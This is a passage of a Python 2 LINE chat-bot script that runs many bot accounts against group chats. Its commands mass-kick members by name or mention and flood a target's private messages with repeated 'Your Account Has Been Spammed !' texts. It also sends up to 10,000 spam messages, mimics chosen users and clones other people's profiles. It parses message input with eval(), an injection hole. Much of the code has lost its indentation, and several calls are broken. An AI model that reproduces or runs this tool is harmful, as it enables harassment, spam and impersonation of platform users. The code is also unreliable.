time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki15.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki15.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck16 " in msg.text:
nk0 = msg.text.replace("Fuck16 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki16.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki16.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki16.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck17 " in msg.text:
nk0 = msg.text.replace("Fuck17 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki17.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki17.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki17.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck18 " in msg.text:
nk0 = msg.text.replace("Fuck18 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki18.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki18.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki18.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif ("Fuck " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick1 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
ki.sendText(msg.to,"Error")
elif ("Kick2 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
except:
ki2.sendText(msg.to,"Error")
elif ("Kick3 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
except:
ki3.sendText(msg.to,"Error")
elif ("Kick4 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki4.kickoutFromGroup(msg.to,[target])
except:
ki4.sendText(msg.to,"Error")
elif ("Kick5 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
ki5.sendText(msg.to,"Error")
elif ("Kick6 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki6.kickoutFromGroup(msg.to,[target])
except:
ki6.sendText(msg.to,"Error")
elif ("Kick7 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki7.kickoutFromGroup(msg.to,[target])
except:
ki7.sendText(msg.to,"Error")
elif ("Kick8 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki8.kickoutFromGroup(msg.to,[target])
except:
ki8.sendText(msg.to,"Error")
elif ("Kick9 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki9.kickoutFromGroup(msg.to,[target])
except:
ki9.sendText(msg.to,"Error")
elif ("Kick10 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki10.kickoutFromGroup(msg.to,[target])
except:
ki10.sendText(msg.to,"Error")
elif ("Kick11 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki11.kickoutFromGroup(msg.to,[target])
except:
ki11.sendText(msg.to,"Error")
elif ("Kick12 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki12.kickoutFromGroup(msg.to,[target])
except:
ki12.sendText(msg.to,"Error")
elif ("Kick13 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki13.kickoutFromGroup(msg.to,[target])
except:
ki13.sendText(msg.to,"Error")
elif ("Kick14 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki14.kickoutFromGroup(msg.to,[target])
except:
ki14.sendText(msg.to,"Error")
elif ("Kick15 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki15.kickoutFromGroup(msg.to,[target])
except:
ki15.sendText(msg.to,"Error")
elif ("Kick16 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki16.kickoutFromGroup(msg.to,[target])
except:
ki16.sendText(msg.to,"Error")
elif ("Kick17 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki17.kickoutFromGroup(msg.to,[target])
except:
ki17.sendText(msg.to,"Error")
elif ("Kick18 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki18.kickoutFromGroup(msg.to,[target])
except:
ki18.sendText(msg.to,"Error")
elif ("Sc " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
key = cl.getContact(key1)
cl.sendText(msg.to,"" + key1)
elif "Bro " in msg.text:
nk0 = msg.text.replace("Bro ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Good Bye")
#-----------------------------------------------------------
elif ("Bye " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
except:
pass
elif ("Ban " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
elif msg.text in ["Mygroups"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[⛓️] %s \n" % (cl.getGroup(i).name + " | ★ Members : " + str(len (cl.getGroup(i).members)))
cl.sendText(msg.to, "☆「Group List」☆\n"+ h +"★ ️Total Group : " +str(len(gid)))
#----------------------------------------------------------
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
#=======================================================
elif "Tr-en " in msg.text:
#if msg.from_ in admin:
txt = msg.text.replace("Tr-en ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Tr-jap " in msg.text:
#if msg.from_ in admin:
txt = msg.text.replace("Tr-jap ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Tr-thai " in msg.text:
#if msg.from_ in admin:
txt = msg.text.replace("Tr-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Tr-id " in msg.text:
#if msg.from_ in admin:
txt = msg.text.replace("Tr-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
#________________________________________________________________________
elif 'ig ' in msg.text.lower():
#if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("ig ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#-----------------------------------------------------------
elif msg.text == "Check":
cl.sendText(msg.to, "Check Yang nyimak")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Cctv":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to,"======CCTV ON====== %s\n=====[CCTV SAAT INI]======\n%s\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to,"An already read point has not been set.\n「set」you can send ♪ read point will be created ♪")
#-------------------------------------------------
elif "Spam @" in msg.text:
# if msg.from_ in admin:
_name = msg.text.replace("Spam @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to,"Wating in progres...")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
cl.sendText(msg.to, "Succes")
print " Spammed !"
#--------------------------------------------------------------------------
#-----------------------------------------------------------
elif "Mban:" in msg.text:
midd = msg.text.replace("Mban:","")
wait["blacklist"][midd] = True
cl.sendText(msg.to,"Target Lock")
#-----------------------------------------------------------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
text = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (text+"\n")
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
ki.sendText(msg.to, text)
else:
cl.sendText(msg.to, "Out Of Range!")
elif txt[1] == "off":
if jmlh <= 10000:
ki.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
#-----------------------------------------------
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
elif "Mimic:" in msg.text:
#if msg.from_ in admin:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on")
else:
cl.sendText(msg.to,"Mimic already on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off")
else:
cl.sendText(msg.to,"Mimic already off")
elif "Add " in cmd:
target0 = msg.text.replace("Add ","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed")
break
elif "Del " in cmd:
target0 = msg.text.replace("Del ","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed!")
break
elif cmd == "Targetlist":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<Lit Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n->" + cl.getContact(mi_d).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal:" + total)
#-----------------------------------------------
#-----------------------------------------------------------
elif msg.text.lower() == 'respon':
ki.sendText(msg.to,"😂HADIR 🔊")
ki2.sendText(msg.to,"😂HADIR 🔊")
# ki3.sendText(msg.to,"done ✔")
# ki4.sendText(msg.to,"done ✔")
# ki5.sendText(msg.to,"done ✔")
# ki6.sendText(msg.to,"done ✔")
#-----------------------------------------------------------speed
elif msg.text in ["Bl:on"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Unbl:on"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'mcheck':
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#---------Fungsi Banlist With Tag--------#
elif msg.text in ["Banlist","ip banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"No user is Blacklisted")
else:
ki.sendText(msg.to,"Blacklisted user")
mc = " 🛡️=||B L A C K L I S T||=🛡️\n"
for mi_d in wait["blacklist"]:
mc += "🕯️️" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Banlist executed"
elif msg.text in ["Clearban"]:
if msg.toType == 2:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear all blacklist")
ki.sendText(msg.to,"done ✔")
ki2.sendText(msg.to,"done ✔")
# ki3.sendText(msg.to,"done ✔")
# ki4.sendText(msg.to,"done ✔")
# ki5.sendText(msg.to,"done ✔")
# ki6.sendText(msg.to,"done ✔")
ki.sendText(msg.to,"blacklist done all removed 👮")
elif msg.text.lower() == 'kick@mbl':
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Daftar hitam pengguna tidak memiliki")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
# ki3.kickoutFromGroup(msg.to,[jj])
# ki4.kickoutFromGroup(msg.to,[jj])
# ki5.kickoutFromGroup(msg.to,[jj])
# ki6.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#-----------------------------------------------
elif "Translate" in msg.text:
cl.sendText(msg.to, "★[TRANSLATE]★\nTr-id ☆to indonesia☆\nTr-en ☆to english☆\nTr-jap ☆to japan☆\nTr-thai ☆to thailand☆\n_______________")
#---------------------------------------------------
#CROT
#---------------------------------------------------
elif "Pict @" in msg.text:
    # Send the profile picture of the group member whose display name
    # exactly matches the mentioned text.
    print "[Command]dp executing"
    _name = msg.text.replace("Pict @","")
    _nametarget = _name.rstrip(' ')
    gs = cl.getGroup(msg.to)
    targets = []
    for g in gs.members:
        if _nametarget == g.displayName:
            targets.append(g.mid)
    if targets == []:
        cl.sendText(msg.to,"Contact not found")
    else:
        for target in targets:
            try:
                contact = cl.getContact(target)
                path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
                cl.sendImageWithURL(msg.to, path)
            except:
                # Best-effort: unreadable contacts are skipped silently.
                pass
    print "[Command]dp executed"
#---------------------------------------------------
elif msg.text in ["Clear"]:
    # Cancel every pending invitation in this group.
    if msg.toType == 2:
        group = cl.getGroup(msg.to)
        gMembMids = [contact.mid for contact in group.invitee]
        for _mid in gMembMids:
            cl.cancelGroupInvitation(msg.to,[_mid])
        cl.sendText(msg.to,"I pretended to cancel and canceled.")
#---------------------------------------------------
elif msg.text in ["Mybackup"]:
    # Restore the profile from the in-memory `mybackup` snapshot
    # (captured elsewhere in the file).
    try:
        cl.updateDisplayPicture(mybackup.pictureStatus)
        cl.updateProfile(mybackup)
        cl.sendText(msg.to, "Backup Sukses Bosqu")
    except Exception as e:
        # Report the failure text back to the chat.
        cl.sendText(msg.to, str (e))
#-----------------------------------------------------------------------
elif "Youtube " in msg.text:
    # Send the first YouTube search-result link for the query.
    # Python 2 APIs: urllib.quote / urllib2.urlopen.
    try:
        textToSearch = (msg.text).replace("Youtube ", "").strip()
        query = urllib.quote(textToSearch)
        url = "https://www.youtube.com/results?search_query=" + query
        response = urllib2.urlopen(url)
        html = response.read()
        soup = BeautifulSoup(html, "html.parser")
        # First anchor with YouTube's result-tile class; None if the page
        # layout changed, which the bare except below also covers.
        results = soup.find(attrs={'class':'yt-uix-tile-link'})
        cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
    except:
        cl.sendText(msg.to,"Could not find it")
#------------------------------------------------
elif "Getinfo" in msg.text:
    # Report name / mid / bio / picture / cover of the first mentioned user.
    # NOTE(review): eval() on message metadata executes arbitrary input;
    # json.loads would be the safe parser here.
    key = eval(msg.contentMetadata["MENTION"])
    key1 = key["MENTIONEES"][0]["M"]
    contact = cl.getContact(key1)
    cu = cl.channel.getCover(key1)
    try:
        cl.sendText(msg.to,"~Nama\n" + contact.displayName + "\n~Mid\n" + contact.mid + "\n~Bio\n" + contact.statusMessage + "\n~Profile Picture\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n~Header\n" + str(cu))
    except:
        # Fallback without the picture URL (e.g. pictureStatus missing).
        cl.sendText(msg.to,"~Nama\n" + contact.displayName + "\n~Mid\n" + contact.mid + "\n~Bio\n" + contact.statusMessage + "\n~Profile Picture\n" + str(cu))
elif "Getbio" in msg.text:
    # Send the mentioned user's status message.
    # NOTE(review): the except branch repeats the identical call, so a
    # failure is retried once and any second failure propagates.
    key = eval(msg.contentMetadata["MENTION"])
    key1 = key["MENTIONEES"][0]["M"]
    contact = cl.getContact(key1)
    cu = cl.channel.getCover(key1)  # fetched but unused here
    try:
        cl.sendText(msg.to,contact.statusMessage)
    except:
        cl.sendText(msg.to,contact.statusMessage)
elif "Gimage" in msg.text:
    # Send the current group's icon image.
    group = cl.getGroup(msg.to)
    path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
    cl.sendImageWithURL(msg.to,path)
elif "Getprofile @" in msg.text:
    # Send the profile picture of the mentioned member
    # (duplicate of the "Pict @" command above).
    print "[Command]dp executing"
    _name = msg.text.replace("Getprofile @","")
    _nametarget = _name.rstrip(' ')
    gs = cl.getGroup(msg.to)
    targets = []
    for g in gs.members:
        if _nametarget == g.displayName:
            targets.append(g.mid)
    if targets == []:
        cl.sendText(msg.to,"Contact not found")
    else:
        for target in targets:
            try:
                contact = cl.getContact(target)
                path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
                cl.sendImageWithURL(msg.to, path)
            except:
                pass
    print "[Command]dp executed"
#-----------------------------------------------------------------#
elif "Getcover @" in msg.text:
    # Send the cover image of the mentioned member.
    print "[Command]cover executing"
    _name = msg.text.replace("Getcover @","")
    _nametarget = _name.rstrip(' ')
    gs = cl.getGroup(msg.to)
    targets = []
    for g in gs.members:
        if _nametarget == g.displayName:
            targets.append(g.mid)
    if targets == []:
        cl.sendText(msg.to,"Contact not found")
    else:
        for target in targets:
            try:
                contact = cl.getContact(target)  # fetched but unused here
                cu = cl.channel.getCover(target)
                path = str(cu)
                cl.sendImageWithURL(msg.to, path)
            except Exception as e:
                print e
elif "Backup" in msg.text:
#if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
#----------------------------
elif "Copy " in msg.text:
    # Clone the mentioned user's display name, status message and
    # profile picture onto this account.
    targets = []
    key = eval(msg.contentMetadata["MENTION"])
    key["MENTIONEES"][0]["M"]  # NOTE(review): no-op expression, result discarded
    for x in key["MENTIONEES"]:
        targets.append(x["M"])
    for target in targets:
        try:
            contact = cl.getContact(target)
            X = contact.displayName
            profile = cl.getProfile()
